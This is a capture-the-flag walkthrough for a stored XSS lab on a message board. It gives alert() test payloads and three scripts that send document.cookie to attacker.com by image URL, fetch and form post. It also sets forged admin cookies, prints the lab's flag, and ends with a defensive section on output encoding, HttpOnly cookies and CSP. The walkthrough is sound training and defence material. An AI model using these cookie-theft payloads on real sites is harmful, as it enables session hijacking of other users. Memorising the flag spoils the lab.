Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
This challenge implements a stored XSS vulnerability with a unique twist: when your payload contains document.cookie, the application automatically replaces it with admin cookie values to simulate an admin visiting your malicious message. The key is to steal these replaced admin cookies to gain access to the admin panel.
<target-ip> to access the community message board
<target-ip>/admin (access denied without privileges)
Name: Test
Message: <script>alert('XSS Confirmed')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<script>
// The application will replace document.cookie with admin cookies
var stolenCookies = document.cookie;
// Display the stolen admin cookies
alert('Stolen admin cookies: ' + stolenCookies);
</script>
In actual attacks, you cannot see the admin's cookies directly. Instead, you must:
Real-World Cookie Theft Payloads:
// Method 1: Image-based exfiltration
<script>
var cookies = document.cookie;
var img = new Image();
img.src = 'http://attacker.com/steal?data=' + encodeURIComponent(cookies);
</script>
// Method 2: Fetch API exfiltration
<script>
fetch('http://attacker.com/steal', {
method: 'POST',
body: 'cookies=' + encodeURIComponent(document.cookie)
});
</script>
// Method 3: Form submission exfiltration
<script>
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://attacker.com/steal';
var input = document.createElement('input');
input.name = 'stolen_cookies';
input.value = document.cookie;
form.appendChild(input);
document.body.appendChild(form);
form.submit();
</script>
Why Real Attacks Require Patience: Unlike this educational simulation, real XSS attacks require waiting for legitimate admin users to visit the compromised page. The cookies are stolen when the admin's browser executes your malicious script, sending their session data to your collection server.
// Replace with actual cookie values from Step 3
document.cookie = 'admin_session=true; path=/;';
document.cookie = 'admin_session_token_[64-hex-value]=active; path=/;';
document.cookie = 'sessionid=admin_12345; path=/;';
<target-ip>/admin
a609f3b4-45a7-4089-bea4-e2f115d40dce
// Example stolen cookie format:
admin_session=true; admin_session_token_[64-hex]=active; sessionid=admin_12345
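From the defender's side, the payloads above stop working when the board encodes messages at output time, the session cookie is HttpOnly, and a Content-Security-Policy restricts inline script and outbound destinations. The following is an added example, not the lab's code; the function names, the CSP value and the sample cookie value are assumptions.

```javascript
// Added example, not the lab's code. Function names, the CSP policy and the
// sample inputs are assumptions made for illustration.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that can open a tag, attribute value or entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: stored input concatenated straight into the page.
function renderMessageVulnerable(name, message) {
  return '<div class="msg"><b>' + name + '</b>: ' + message + '</div>';
}

// Hardened pattern: stored input is encoded when it is written into HTML.
function renderMessageSafe(name, message) {
  return '<div class="msg"><b>' + escapeHtml(name) + '</b>: ' + escapeHtml(message) + '</div>';
}

// HttpOnly keeps the cookie out of document.cookie, so an injected script
// cannot read it; Secure and SameSite narrow where the browser sends it.
function sessionCookieHeader(name, value) {
  return name + '=' + encodeURIComponent(value) + '; Path=/; HttpOnly; Secure; SameSite=Strict';
}

// Second layer: no inline scripts or handlers, and image, fetch and form
// destinations limited to the site's own origin.
const CSP_HEADER = "default-src 'self'; script-src 'self'; form-action 'self'; base-uri 'none'";

// True when rendered output still carries a live tag of the kinds used above.
function hasActiveMarkup(html) {
  return /<\s*(script|img|svg)\b/i.test(html);
}

// Constructed sample input: the three alert() test messages from this page.
const SAMPLE_MESSAGES = [
  "<script>alert('XSS Confirmed')</script>",
  "<img src=x onerror=alert('XSS')>",
  "<svg onload=alert('XSS')>",
];

for (const msg of SAMPLE_MESSAGES) {
  console.log(hasActiveMarkup(renderMessageVulnerable('Test', msg)),
              hasActiveMarkup(renderMessageSafe('Test', msg)));
}
console.log('Set-Cookie: ' + sessionCookieHeader('sessionid', 'constructed-value'));
console.log('Content-Security-Policy: ' + CSP_HEADER);
```

Each sample message prints `true false`: live markup in the concatenated output, inert text in the encoded output.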